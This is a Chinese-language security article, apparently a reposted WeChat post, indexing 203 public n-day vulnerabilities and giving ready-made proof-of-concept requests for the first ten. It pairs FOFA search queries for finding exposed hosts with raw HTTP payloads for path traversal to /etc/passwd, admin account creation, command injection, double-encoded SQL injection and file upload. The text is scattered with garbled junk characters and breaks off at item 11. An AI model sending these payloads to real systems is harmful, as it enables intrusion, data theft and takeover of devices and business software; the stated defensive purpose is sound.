互联网公开漏洞整理202309-2024060 ~ ?8 h7 @* T6 P2 B" f9 _
道一安全 2024-06-05 07:41 北京& W; b7 X. y% k/ P+ ]) }
以下文章来源于网络安全新视界 ,作者网络安全新视界
9 i2 b4 @' z1 v- ]8 M" Y
/ W* ^, V4 ^) J$ s: N0 ]/ e$ Q: d发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
) G& k, ]2 [) O5 p- p+ Q
- h* m% t U% E: t漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。: W. z+ Y8 G0 @+ h
1 d( Z7 g3 f v
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。5 m6 p) ^; b7 z4 e
& w$ y- y/ S! m5 S8 y
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
6 j; W! b9 _7 E6 `. s; w4 S
8 I! B, a; J% ^4 R2 @合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
, w O. \ S3 p6 u& b
! i- X5 [7 ~" _# A- s) Y9 C1 z9 e, \
声明
7 P0 v4 d" i: U! t# t3 k8 r3 C% t* u2 [: s+ _
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
. }5 Y' ^- U z |5 [% ~; N d! f6 _4 C2 _
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。1 ?' T0 U2 ]4 I
W) \" L& w' T: A' D) J+ b
+ G2 B, H1 t' J, P
$ g3 G# j, `! S目录
' b! P) R" H$ `- F; O# @6 f
% Y) d6 `! }8 ^ j01, f2 S1 @8 H- G) z- h# W
% X8 R8 K, F! _, `7 t B
1. StarRocks MPP数据库未授权访问
# ]9 _* N+ _: h8 W9 a( `2. Casdoor系统static任意文件读取 P1 a; L d0 ^" H9 z) b, F+ B4 n0 A
3. EasyCVR智能边缘网关 userlist 信息泄漏
# k' x8 g0 T7 M# T1 Z3 U4. EasyCVR视频管理平台存在任意用户添加
5 D) U! ]. d7 x+ m4 k6 x5. NUUO NVR 视频存储管理设备远程命令执行0 v3 |/ l- @" M% c
6. 深信服 NGAF 任意文件读取9 b2 S) L; L/ F$ B
7. 鸿运主动安全监控云平台任意文件下载
, `7 N" C9 @0 i$ T) d& ?8. 斐讯 Phicomm 路由器RCE
6 {$ {; k& c# q4 P! J# }4 |9 G9. 稻壳CMS keyword 未授权SQL注入
# y/ e$ V4 ]5 o* S& n10. 蓝凌EIS智慧协同平台api.aspx任意文件上传/ R' f8 o/ n |' a2 w
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入8 G' }% A& W0 h: s% ], D @& L- \; ]
12. Jorani < 1.0.2 远程命令执行
0 h1 |- G. V- h l! z3 d4 T: W' D13. 红帆iOffice ioFileDown任意文件读取$ J/ S. g2 B) ?1 d
14. 华夏ERP(jshERP)敏感信息泄露2 ~' g+ t: ?( ?; {" y' ?7 K
15. 华夏ERP getAllList信息泄露( T9 L6 d" O) t6 Z& J5 C/ W5 @
16. 红帆HFOffice医微云SQL注入. F5 Q6 {1 {( j- B" F0 R5 S+ @, y2 _5 r, @) e
17. 大华 DSS itcBulletin SQL 注入
$ z( ? c# L5 i% Z; z% B18. 大华 DSS 数字监控系统 user_edit.action 信息泄露) y% a' w/ h1 O2 e F8 K7 X7 k
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
0 U! U, S$ H6 O5 ]. S W. a- w$ ~20. 大华ICC智能物联综合管理平台任意文件读取5 Y) F/ n8 M: A0 R% u
21. 大华ICC智能物联综合管理平台random远程代码执行
, C; ?! t. k' `6 K, s" A" z$ @& T22. 大华ICC智能物联综合管理平台 log4j远程代码执行. ?$ z) W* U) q! W
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行: s2 B* E9 T6 C! M, L2 @* x
24. 用友NC 6.5 accept.jsp任意文件上传
$ h* q4 u5 B, E5 J25. 用友NC registerServlet JNDI 远程代码执行
/ \8 S8 ^1 K( b5 Y, C26. 用友NC linkVoucher SQL注入
; P" P9 D$ w" G* ?4 A3 ?& Q5 y) V27. 用友 NC showcontent SQL注入
9 M5 u7 n$ U: N3 V U1 a0 k; \28. 用友NC grouptemplet 任意文件上传
8 h' \: \5 W( c: `+ ]' P, ~29. 用友NC down/bill SQL注入
; `' |/ ~( L: I8 `30. 用友NC importPml SQL注入: B3 Z R0 ]# J
31. 用友NC runStateServlet SQL注入
. W# e( I$ ]4 V- g) A, }6 U32. 用友NC complainbilldetail SQL注入4 J" C2 K8 r7 P5 v4 h2 D; u
33. 用友NC downTax/download SQL注入# }2 h4 e' i* r$ \6 H
34. 用友NC warningDetailInfo接口SQL注入
1 p6 z6 K) o$ u( H% B35. 用友NC-Cloud importhttpscer任意文件上传
# J# M6 u. [6 {: I) p& y1 O- I36. 用友NC-Cloud soapFormat XXE+ H% [6 N- o2 ^3 a% p
37. 用友NC-Cloud IUpdateService XXE1 Q5 F: Q, x; z, U7 l
38. 用友U8 Cloud smartweb2.RPC.d XXE
7 l1 U. k5 ?1 T# W7 d8 R- [ R39. 用友U8 Cloud RegisterServlet SQL注入9 s% r v1 V, P8 i( t
40. 用友U8-Cloud XChangeServlet XXE% W6 I! | |+ o/ \9 w q
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
6 W! r/ e! \+ R# \42. 用友GRP-U8 SmartUpload01 文件上传8 k' k- }! E, {% q
43. 用友GRP-U8 userInfoWeb SQL注入致RCE2 {- f2 X8 n9 s) t" d
44. 用友GRP-U8 bx_dj_check.jsp SQL注入' }0 c( ~3 n) ?' ^; ?2 |
45. 用友GRP-U8 ufgovbank XXE
( W( w) [+ @" B) [: L% H: _46. 用友GRP-U8 sqcxIndex.jsp SQL注入
4 n0 d# @) V8 c47. 用友GRP A++Cloud 政府财务云 任意文件读取
4 x3 L, G, o3 I0 i E* A48. 用友U8 CRM swfupload 任意文件上传
/ e! m% C1 l( J* A49. 用友U8 CRM系统uploadfile.php接口任意文件上传
3 K, D3 \: F* F8 a50. QDocs Smart School 6.4.1 filterRecords SQL注入
, \. D7 @; T) j! I51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
) {9 l; e I1 _$ I4 z; y8 O52. 泛微E-Office json_common.php sql注入
* X y4 h+ {; a; b4 z" j2 h+ R53. 迪普 DPTech VPN Service 任意文件上传 q8 A' h; [9 e/ ^* E M
54. 畅捷通T+ getstorewarehousebystore 远程代码执行) Z, v& P' r$ ~1 Y5 J# I+ e1 g, ~
55. 畅捷通T+ getdecallusers信息泄露
# y; S1 R9 \: D0 i$ J56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE/ a5 }- U3 g- G" ]
57. 畅捷通T+ keyEdit.aspx SQL注入
$ t" s0 s: K5 S) N58. 畅捷通T+ KeyInfoList.aspx sql注入
! v* u3 i/ `% R; T59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行- G( \5 \" R! q. \
60. 百卓Smart管理平台 importexport.php SQL注入
, O5 p+ Y* h8 H# e2 y61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
[( ^! |# w1 {+ A62. IP-guard WebServer 远程命令执行
. M( {4 m) c9 Z3 H# [& S63. IP-guard WebServer任意文件读取
3 i4 n& o+ s9 [& f( \64. 捷诚管理信息系统CWSFinanceCommon SQL注入
) d& b* u9 P. h9 A$ _6 `% n65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
T' K% M9 v& @* @2 z66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入- X0 n8 U5 @% C% k8 F
67. 万户ezOFFICE wpsservlet任意文件上传
/ [. u7 H' i) P+ B& `% A. {68. 万户ezOFFICE wf_printnum.jsp SQL注入
: c% M( {, l4 m8 C2 [69. 万户 ezOFFICE contract_gd.jsp SQL注入
/ q+ d! _. o6 K1 m' a70. 万户ezEIP success 命令执行
8 q. _1 s( ~- c; ^71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
S6 B- v( g2 f$ I/ O72. 致远OA getAjaxDataServlet XXE( |6 r( k* V; ~5 ~
73. GeoServer wms远程代码执行
' K9 r+ e, S( C# @% |4 E! z/ d74. 致远M3-server 6_1sp1 反序列化RCE0 {) H* y: C6 U3 h# B/ E
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
- N0 L+ r8 G% g76. 新开普掌上校园服务管理平台service.action远程命令执行; c( v& P) N/ q/ }
77. F22服装管理软件系统UploadHandler.ashx任意文件上传/ m" f0 ^0 M2 \( r5 {9 [
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传& q0 V9 R" V1 G [3 i) @ S
79. BYTEVALUE 百为流控路由器远程命令执行
& `- A! B2 I3 l+ c4 ?80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传( X' U ?" Z: j3 L5 \$ N0 E5 O
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露( `2 Q# `; X! s$ I+ k7 t1 J J
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行' L$ V5 T' O. I, Q3 T
83. JeecgBoot testConnection 远程命令执行
6 _: S1 |/ `: s, z' M, b: L, o/ ?# w84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
C o, F' M G+ h% P: q85. SysAid On-premise< 23.3.36远程代码执行
$ t/ B0 A& J7 d4 }/ I* @86. 日本tosei自助洗衣机RCE
/ e( s4 F3 D6 k: [- F1 h8 q! q5 |87. 安恒明御安全网关aaa_local_web_preview文件上传
& E: b5 H# o4 s+ z: T88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
! t* Q' B2 L q( f3 D; m89. 致远互联FE协作办公平台editflow_manager存在sql注入
$ F# A# N. z: K3 Y7 p90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
) a' T- E: N1 C" o0 M) a, k4 h. R! J- V91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
; ~7 Q& {1 H5 D92. 海康威视运行管理中心session命令执行
- w# ]' _4 o! g2 a1 P; @8 C6 t93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
) V# ?4 I& u0 Q$ r t/ y$ z( h94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
8 d6 V. d O/ ]0 W- }* W& V2 O95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
% g( x7 B) l% o2 F96. Apache OFBiz 18.12.11 groovy 远程代码执行
- I+ w# Z! F5 }) g7 S97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行$ P6 F( r" d, `$ w& _7 S
98. SpiderFlow爬虫平台远程命令执行& F/ c1 f( I2 O2 I3 h- Q/ N" b C% F
99. Ncast盈可视高清智能录播系统busiFacade RCE8 g/ I' B: ~4 P( S8 D# e' c
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传0 \$ x/ X3 X: E- Y
101. ivanti policy secure-22.6命令注入
1 J& A8 i, w7 v. d4 p102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行+ m0 y0 c2 @; K5 a
103. Ivanti Pulse Connect Secure VPN XXE" D' y# h- `: ]. y3 M
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露$ Q$ ~8 I4 j* N: l7 |4 U/ p
105. SpringBlade v3.2.0 export-user SQL 注入& f5 C- |3 O; `9 [/ _# F
106. SpringBlade dict-biz/list SQL 注入
; h2 b* W4 D: ?# a/ S; j3 O4 [4 ~107. SpringBlade tenant/list SQL 注入
p L# O2 ^, n- W108. D-Tale 3.9.0 SSRF
/ R( r5 j$ n( ^; K# P109. Jenkins CLI 任意文件读取
7 r' Y5 f. b4 Q9 @ N O, S110. Goanywhere MFT 未授权创建管理员
+ G* d: \' U2 n. X X111. WordPress Plugin HTML5 Video Player SQL注入
5 `% ?% D& Q( J0 C' J1 K! @112. WordPress Plugin NotificationX SQL 注入5 b) J7 j# F+ C v' m5 s1 ?
113. WordPress Automatic 插件任意文件下载和SSRF
h1 G( x @2 M8 J: B114. WordPress MasterStudy LMS插件 SQL注入0 I; P# c; s5 p9 j0 y( y
115. WordPress Bricks Builder <= 1.9.6 RCE
, x% p' K6 K9 k* T116. wordpress js-support-ticket文件上传2 Q! [+ p0 E! v) V) T: w( z4 v$ @( C
117. WordPress LayerSlider插件SQL注入
* ]- N' q8 K e0 B8 ^9 h118. 北京百绰智能S210管理平台uploadfile.php任意文件上传0 H6 o" n# Y# V T% N/ U E
119. 北京百绰智能S20后台sysmanageajax.php sql注入, |" d2 d. e8 H& C; Z
120. 北京百绰智能S40管理平台导入web.php任意文件上传
3 @$ u1 t6 v' b0 `2 a121. 北京百绰智能S42管理平台userattestation.php任意文件上传4 a# J$ o5 [* T% k$ y# X. ?5 q/ m
122. 北京百绰智能s200管理平台/importexport.php sql注入
/ D# i5 O6 N+ ^7 z; o/ M1 ~) x123. Atlassian Confluence 模板注入代码执行8 O3 [, D& h6 z. O* Y
124. 湖南建研工程质量检测系统任意文件上传5 }9 K3 `2 L) I
125. ConnectWise ScreenConnect身份验证绕过
1 N, q6 \# S/ w4 }5 ?+ w5 i126. Aiohttp 路径遍历
5 v+ ^ Y4 t$ {127. 广联达Linkworks DataExchange.ashx XXE
' e+ S' @" [/ O5 I) W7 ?( G0 a128. Adobe ColdFusion 反序列化4 z, G |( a/ s$ r$ D) N2 `
129. Adobe ColdFusion 任意文件读取
5 V; }: w- M3 A+ i: R# ?130. Laykefu客服系统任意文件上传
4 L; C2 F3 v# k8 K. d: K131. Mini-Tmall <=20231017 SQL注入3 R6 ~* U2 X+ D/ ?5 i T8 O' ]: o
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过: _+ x; {) e6 I1 n
133. H5 云商城 file.php 文件上传$ L8 w7 e) |8 A' o
134. 网康NS-ASG应用安全网关index.php sql注入; `/ B, ]( g% y' |0 h y9 o5 M
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入7 ]; [$ O$ i7 @+ }' j
136. NextChat cors SSRF
! ]# Q0 Y5 a4 r5 b |137. 福建科立迅通信指挥调度平台down_file.php sql注入
, J6 W- A+ b) j$ M9 A2 j138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
; r" k2 u3 o: S0 ^1 l139. 福建科立讯通信指挥调度平台editemedia.php sql注入. `/ A; x3 F4 m) u- m% n9 ?
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
+ e; B* c( a4 V, F$ E) H' W141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入* Z; R# j" \& J3 B3 l' {
142. CMSV6车辆监控平台系统中存在弱密码5 `9 T6 r) I$ ~0 X$ M5 g9 P
143. Netis WF2780 v2.1.40144 远程命令执行" b# R q4 B$ N: p1 C' j8 _; ]
144. D-Link nas_sharing.cgi 命令注入
& [% b' U" R* X; Y# T( ~145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
3 G& F7 u9 E9 O$ D146. MajorDoMo thumb.php 未授权远程代码执行
. V2 d' G. H$ ~: A" ^4 [147. RaidenMAILD邮件服务器v.4.9.4-路径遍历/ W7 k; T" c# c$ N% h2 [$ ]
148. CrushFTP 认证绕过模板注入
* x6 {3 X6 O6 x8 T! Z' k149. AJ-Report开源数据大屏存在远程命令执行; ~+ L Y, ?4 \$ E3 s& l6 l/ K
150. AJ-Report 1.4.0 认证绕过与远程代码执行
: `. Q' H* p# ?( ^# t& ?9 Y151. AJ-Report 1.4.1 pageList sql注入2 S$ ~7 w- ], y! L2 z0 p, I
152. Progress Kemp LoadMaster 远程命令执行( q& [9 k3 Q1 i$ c: L. Q
153. gradio任意文件读取# j/ ~0 [- F0 {0 F+ V# W
154. 天维尔消防救援作战调度平台 SQL注入; n; J' h6 e$ B1 {; y5 P0 K) @/ Y( f4 E5 B; ]
155. 六零导航页 file.php 任意文件上传, [0 K: R+ W! h/ N0 B
156. TBK DVR-4104/DVR-4216 操作系统命令注入% H8 m% v: I, I; c7 z6 C* i
157. 美特CRM upload.jsp 任意文件上传
8 \' W/ \& _' J3 V" r158. Mura-CMS-processAsyncObject存在SQL注入! ]6 G: K7 j: e. N. x, {
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
: _& I* B( l' t+ y" t7 g' E* }160. Sonatype Nexus Repository 3目录遍历与文件读取
$ G" l. J+ m6 l ^5 t2 u3 X. P161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
4 ?* E2 Q! }) a. K$ W8 v4 `7 C" P( r7 D162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传- E& E1 T) B$ y
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传" r6 M- ?1 d) O5 U# }
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传( B4 @# S8 p- S( p7 N2 j. E
165. OrangeHRM 3.3.3 SQL 注入% e1 c( ~% V8 C f3 \! p+ q: i
166. 中成科信票务管理平台SeatMapHandler SQL注入3 c; V, b9 }+ O0 k' I! H" A1 G9 }# Q
167. 精益价值管理系统 DownLoad.aspx任意文件读取
6 s& W& ?; X" C/ H) r168. 宏景EHR OutputCode 任意文件读取: O# m: r) j9 B4 x8 f% H
169. 宏景EHR downlawbase SQL注入6 Z8 K" [- Q2 f" x
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
2 v0 D/ {6 R5 x( _5 N. @( R1 `7 O; F171. 通天星CMSV6车载定位监控平台 SQL注入
. m! s0 V5 o7 N: I172. DT-高清车牌识别摄像机任意文件读取
* i/ T# q& F E( [6 Y) F173. Check Point 安全网关任意文件读取
( h' l( C9 N8 ^" l- g( u+ G2 @174. 金和OA C6 FileDownLoad.aspx 任意文件读取% h; \1 k: i! L) z1 U* q4 G
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入3 s/ d+ C- {3 \7 |- S
176. 电信网关配置管理系统 rewrite.php 文件上传5 P: K) F& f& _( H* Z( J" F7 _
177. H3C路由器敏感信息泄露
" V) u9 G# f" a2 w178. H3C校园网自助服务系统-flexfileupload-任意文件上传) T% r7 c0 y5 V! ` W2 {
179. 建文工程管理系统存在任意文件读取
/ K, z2 N* h" B, k$ L/ }180. 帮管客 CRM jiliyu SQL注入
8 J3 {" D# t, f; d7 j- M8 o181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
3 H1 r+ m: Q# U( s, [) t& F; d7 t" [182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
3 y# M0 M' X( Q5 l183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入7 v" R$ x, J8 L# y6 Q
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
4 W6 B2 N7 m4 Y+ Z5 K/ a185. 瑞友天翼应用虚拟化系统SQL注入9 B0 z# G/ `- q
186. F-logic DataCube3 SQL注入( A+ X- S" U" D& c9 A" s# M
187. Mura CMS processAsyncObject SQL注入
( k. n" y$ i1 I5 R188. 叁体-佳会视频会议 attachment 任意文件读取! ?- ?6 S4 i* k y! s, [
189. 蓝网科技临床浏览系统 deleteStudy SQL注入, _# ~0 x% w& P+ R
190. 短视频矩阵营销系统 poihuoqu 任意文件读取" e& D3 y' @7 W
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入, g) M1 a, f2 @6 l2 [( E
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传9 }0 g, N3 l) T7 l
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
" P* Q& O9 b" r1 ^- I7 i1 \194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传4 u; o! ^2 B/ Y7 k; A) W
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行( y4 `5 [1 d9 S" R
196. 河南省风速科技统一认证平台密码重置
& E( f4 E7 ]( o$ Z3 r c$ Y: f. ^197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入9 w, J# \9 X1 J2 o2 b
198. 阿里云盘 WebDAV 命令注入5 L7 h4 E- F& q. Z i: i' M
199. cockpit系统assetsmanager_upload接口 文件上传
, }( [% k4 Z) o: B( a: M) z4 O200. SeaCMS海洋影视管理系统dmku SQL注入
2 H' s, {# L n' y& q201. 方正全媒体新闻采编系统 binary SQL注入
$ n% d1 r p& U$ ~202. 微擎系统 AccountEdit任意文件上传$ C+ E* K/ {& x
203. 红海云EHR PtFjk 文件上传" J6 d0 {* _) s
1 |( d" _9 d& G/ [/ \. e" F& p
POC列表
5 q1 r4 H) I0 c/ M* i' ]+ x0 {* t: c/ A+ c! ?4 D* I
02
+ u) Z5 S6 C) r' J9 H3 a+ q6 Q+ l& }
1. StarRocks MPP数据库未授权访问# N" Q- p* e" p; h- ~
FOFA :title="StarRocks"
4 ~4 D% o- w. e' N d5 cGET /mem_tracker HTTP/1.1
( c/ C) ]0 r' `Host: URL/ @: ^2 c$ e8 R7 i4 \0 l
1 R1 t. t% _3 l' I7 t5 j" Y9 W
x) e1 k& o. F4 j" Q# M& n
2. Casdoor系统static任意文件读取' n& p$ O) G2 P8 I' [
FOFA :title="Casdoor"
8 J# P0 h- W5 c, a$ |GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1% l s* ]; T9 I& I. g7 Q
Host: xx.xx.xx.xx:9999% K3 c$ }- S( [6 x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' [9 s* T# D( @2 A
Connection: close& Q+ \; L1 Q/ X+ J9 O, z
Accept: */*' n8 ^4 V7 l1 d$ S7 l7 I# J2 W
Accept-Language: en- m& {0 y: k F7 y; x; |
Accept-Encoding: gzip
$ b j+ n% E' { z- k' W0 \8 |1 e- Q5 o' \4 r6 h+ I. A9 _
5 O3 o2 ^0 A# b- Y
3. EasyCVR智能边缘网关 userlist 信息泄漏
5 O) W% p) i1 w9 q0 b3 h5 [4 [; }FOFA :title="EasyCVR"2 A) D5 ?8 a4 u$ r0 D
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
& V' d) n {4 i5 D, G* k" L. ?Host: xx.xx.xx.xx
) Y) c5 h" ~1 x" M/ k: ^
$ c6 G" l" f3 H( ]0 G8 W: {) T7 b3 O9 Z! l; g
4. EasyCVR视频管理平台存在任意用户添加+ Z$ X5 }, F, O' m
FOFA :title="EasyCVR"
. q4 A% X& U. X( s; }$ p6 e* v, E' b# |& K& y: I
password更改为自己的密码md5
2 S0 L( g) K; y, r& ^POST /api/v1/adduser HTTP/1.15 X& j: Z( Z* K! X: O
Host: your-ip9 `0 i1 w6 L$ y7 N6 n/ Y- B
Content-Type: application/x-www-form-urlencoded; charset=UTF-8& g2 l, `& Y9 u" X* t
, S' Y" i1 c) F; Y" H1 \ I
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
1 g: \5 F" P9 a7 m6 H) ?' |
* k0 x6 M3 V1 ^. ~# S9 [% A! O: O0 y- x* I; m& N+ F. l T4 ?2 c( o$ q% X
5. NUUO NVR 视频存储管理设备远程命令执行4 T9 `/ @" ?4 b3 [
FOFA:title="Network Video Recorder Login"% F/ ]) t+ }% ]' `4 H5 a5 ]0 Q
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1, s9 R6 A' ?, n7 W
Host: xx.xx.xx.xx, |* f3 U/ Q, t% g0 W
7 w0 \* |4 |8 o8 U3 }) M6 R2 T
# A: M! f: w; o0 j* b6. 深信服 NGAF 任意文件读取6 X# q3 ^8 P# {( ]; A
FOFA:title="SANGFOR | NGAF"
% j, J6 U1 m2 x. A9 FGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1; c& Q5 v) L: J5 L: q
Host:* j3 q2 o' l* E$ {- g; ~
3 {! V0 y& i! U
3 B- w! [; j' C. K- h7. 鸿运主动安全监控云平台任意文件下载! h; V& J5 G9 u( ?& b$ k
FOFA:body="./open/webApi.html"+ ~ K9 q2 {! z J" v
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
$ n9 d* r# g/ }/ dHost:
/ ]. i6 w1 K) o" H& q: S+ J
- Q C0 J3 b9 m% |) t; {9 a2 l5 d& p7 t) z+ t/ r2 z. T
8. 斐讯 Phicomm 路由器RCE" q( V% p3 B# P
FOFA:icon_hash="-1344736688"6 k) ^ \6 K" q* H2 A
默认账号admin登录后台后,执行操作
, q. H' K+ X0 mPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
5 V9 L3 a3 w. O6 h, s U4 OHost: x.x.x.x
( N5 ^( h; B+ F/ _9 ]9 s5 M! |! HCookie: sysauth=第一步登录获取的cookie
; v) z9 k0 }9 b1 N$ lContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz+ T5 Q6 E$ U, E5 D
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 n- N) e o6 ]7 k' i" f6 x5 R
% ]# ?1 N! K& O) ]
------WebKitFormBoundaryxbgjoytz
' T0 W/ z" p* [( h# Z- M3 ?. |' LContent-Disposition: form-data; name="wifiRebootEnablestatus"
, C: o9 c. P3 E( {3 q4 ~: f. _& ?: x7 c! D: r$ h' x# v* x
%s
: h; [: M* n! s1 E1 z------WebKitFormBoundaryxbgjoytz) {" m3 p1 J( J
Content-Disposition: form-data; name="wifiRebootrange") I" G$ B" ]: T; J
- H3 a6 _* Q+ n: x0 Z8 Z
12:00; id;
' h3 p' ^& _6 L5 R% b3 u------WebKitFormBoundaryxbgjoytz- \) x" M' g( ^5 ?7 O
Content-Disposition: form-data; name="wifiRebootendrange"
$ z6 f# {& J; [0 U" R3 j3 z' ~& S, \0 ?: j, G+ _) g( x
%s:
( E z$ t* b# Y( R------WebKitFormBoundaryxbgjoytz
/ S. C* i' U: DContent-Disposition: form-data; name="cururl2"1 R" x: `0 b+ B( ^( h
5 h) f0 T( J) e# C# d8 j
' R: h3 y S5 u& f: b; P------WebKitFormBoundaryxbgjoytz--
1 C- c! u l" e9 S7 P. t! a5 u; z: P1 I5 d% H/ }8 R; x% e
$ Q1 r2 X2 \# J: G0 s! i ~/ Z9 |
9. 稻壳CMS keyword 未授权SQL注入9 ]9 Y% _! Y& [1 g
FOFA:app="Doccms"
: I ]/ I7 p ~% k5 Q9 T/ _: nGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.18 |; ~# k' `& F6 S; P2 N- z
Host: x.x.x.x. e. D4 _$ M3 Z- k9 g6 a0 t
0 _; q) ? Q5 J+ V) G) b. }# M$ a2 @) M- C2 B: _
payload为下列语句的二次Url编码
* Y: q1 b8 p' y' W6 m+ b& [
, o: N2 s/ @3 T1 I' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
, B. S9 U+ `2 h: q. H. W
+ G* \& C7 j+ d {0 j! H10. 蓝凌EIS智慧协同平台api.aspx任意文件上传7 d% n- @# F" m/ d
FOFA:icon_hash="953405444"
5 c. _! E3 m! a/ B- A V0 \6 ?
2 E+ _! ?0 j* T文件上传后响应中包含上传文件的路径
0 [. d* J) Q, c2 \! y! L. H% vPOST /eis/service/api.aspx?action=saveImg HTTP/1.19 {+ w ]( q$ M+ [. K+ x& j
Host: x.x.x.x:xx: `5 h+ o. x1 B8 l z* ~5 ^- X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 [2 q8 _, P+ m: T. W: ^
Content-Length: 197$ I0 ]& z0 _, q( w2 J* U* z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" J: }7 \6 X& K' l0 Z3 L
Accept-Encoding: gzip, deflate X9 x# g% z2 ^1 n! A
Accept-Language: zh-CN,zh;q=0.98 ~" U6 X v, n8 c8 b$ e9 T! g7 ]
Connection: close; v3 w2 r+ j3 s d' W
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
8 m) H/ h3 H4 j6 w; e X: b) _) B/ C
------WebKitFormBoundaryxdgaqmqu
2 g8 S; @1 e7 a( J" AContent-Disposition: form-data; name="file"filename="icfitnya.txt"% [! O3 B$ @0 C! G# @) S( x
Content-Type: text/html
$ g1 P Q/ P: Q; b9 k7 k3 y' U8 m) m) \' ?
jmnqjfdsupxgfidopeixbgsxbf; J6 } D# ~! f# r, K+ _
------WebKitFormBoundaryxdgaqmqu--' G4 n. E! }/ y( b
& D9 B8 k* s+ e; z2 t
W3 m0 C* L( Q, n. A6 {- Y
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
